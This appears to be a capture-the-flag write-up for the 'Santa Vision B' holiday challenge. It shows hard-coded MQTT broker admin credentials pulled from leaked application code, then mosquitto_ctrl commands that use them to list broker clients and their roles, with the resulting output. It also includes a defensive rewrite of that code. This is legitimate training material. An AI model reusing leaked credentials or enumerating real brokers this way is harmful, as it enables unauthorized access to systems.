Santa Vision B

Difficulty: ❄ ❄ ❄ ❄ ❄
Once logged on, authenticate further without using Wombley’s or Alabaster’s accounts to see the northpolefeeds on the monitors. What username worked here?

Silver

On further analysis of the contents of /static/sv-application-2024-SuperTopSecret-9265193/applicationDefault.bin, I found the file app/src/core/views.py, which led to the user SantaBrokerAdmin:

# ...omissis...
mqttPublish.single("$CONTROL/dynamic-security/v1","{\"commands\":[{\"command\": \"deleteClient\",\"username\": \""+name+"\"}]}",hostname="localhost",port=1883,auth={'username':"SantaBrokerAdmin", 'password':"8r0k3R4d1mp455wD"})
# ...omissis...
mqttPublish.single("$CONTROL/dynamic-security/v1","{\"commands\":[{\"command\": \"removeRoleACL\",\"rolename\": \""+PlyrRole+"\",\"acltype\": \"subscribeLiteral\",\"topic\": \""+PlyrTopic+"\"}]}",hostname="localhost",port=1883,auth={'username':"SantaBrokerAdmin", 'password':"8r0k3R4d1mp455wD"})
# ...omissis...
mqttPublish.single("$CONTROL/dynamic-security/v1","{\"commands\":[{\"command\": \"deleteRole\",\"rolename\": \""+PlyrRole+"\"}]}",hostname="localhost",port=1883,auth={'username':"SantaBrokerAdmin", 'password':"8r0k3R4d1mp455wD"})
# ...omissis...
mqttPublish.multiple(CreatePlayerClients,hostname="localhost",port=1883,auth={'username':"SantaBrokerAdmin", 'password':"8r0k3R4d1mp455wD"})
# ...omissis...

I could then use this user to log in and subscribe to additional feeds (e.g. #). The answer for this was the username SantaBrokerAdmin.
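An added example (not code from the application or from this write-up) of how the publish calls in the views.py excerpt could avoid both the embedded broker admin password and the JSON built by string concatenation. It assumes mqttPublish is paho.mqtt.publish; the environment variable names, the ca_file parameter and TLS port 8883 are assumptions.

```python
import json
import os

DYNSEC_TOPIC = "$CONTROL/dynamic-security/v1"  # control topic from the excerpt


def concat_payload(name):
    """Payload built the way the excerpt does it: raw string concatenation."""
    return "{\"commands\":[{\"command\": \"deleteClient\",\"username\": \"" + name + "\"}]}"


def dynsec_payload(command, **fields):
    """Serialize one dynamic-security command; json.dumps escapes every value."""
    return json.dumps({"commands": [{"command": command, **fields}]})


def broker_auth(env=None):
    """Load broker credentials at runtime instead of hard-coding them.

    MQTT_ADMIN_USER and MQTT_ADMIN_PASS are hypothetical variable names.
    """
    env = os.environ if env is None else env
    try:
        return {"username": env["MQTT_ADMIN_USER"], "password": env["MQTT_ADMIN_PASS"]}
    except KeyError as missing:
        raise RuntimeError(f"broker credential {missing} is not set") from None


def is_valid_json(text):
    """True when text parses as JSON, False otherwise."""
    try:
        json.loads(text)
        return True
    except ValueError:
        return False


def delete_client(name, ca_file, hostname="localhost", port=8883):
    """Publish deleteClient over TLS (port and ca_file are assumptions)."""
    import paho.mqtt.publish as mqttPublish  # assumed to be the excerpt's library
    mqttPublish.single(DYNSEC_TOPIC, dynsec_payload("deleteClient", username=name),
                       hostname=hostname, port=port, auth=broker_auth(),
                       tls={"ca_certs": ca_file})


if __name__ == "__main__":
    sample = 'elf"anon'  # constructed client name containing a quote
    print(is_valid_json(concat_payload(sample)))
    print(json.loads(dynsec_payload("deleteClient", username=sample)))
```

With credentials supplied at runtime, recovering the application bundle no longer yields the broker admin login, and the TLS option addresses the plaintext warning that mosquitto_ctrl prints.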

Gold

By listing all the clients, I noticed that santashelper2024 was the only one I still had no information about that had access to the feed:

(act3-SantaVision) thedead@maccos act3-SantaVision % mosquitto_ctrl -v -h 34.44.88.211 -p 1883 -u SantaBrokerAdmin -P 8r0k3R4d1mp455wD dynsec listClients      
Warning: You are running mosquitto_ctrl without encryption.
This means all of the configuration changes you are making are visible on the network, including passwords.

AlabasterS
AlabasterS-viewer
SantaBrokerAdmin
WomblyC
WomblyC-viewer
elfanon
elfmonitor
elfmonitor-viewer
santaMonitor
santashelper2024
santashelper2024-viewer

(act3-SantaVision) thedead@maccos act3-SantaVision % mosquitto_ctrl -v -h 34.44.88.211 -p 1883 -u SantaBrokerAdmin -P 8r0k3R4d1mp455wD dynsec getClient santashelper2024
Warning: You are running mosquitto_ctrl without encryption.
This means all of the configuration changes you are making are visible on the network, including passwords.

Username: santashelper2024
Clientid:
Roles: FrostbitFeedsReadRole (priority: -1)
NorthPoleFeedsAdminRole-viewer (priority: -1)
NorthPoleFeedsSantaHelperRole-viewer (priority: -1)
SantaFeedsRole (priority: -1)
SiteStatusElfRole (priority: -1)

The answer for the gold trophy is santashelper2024.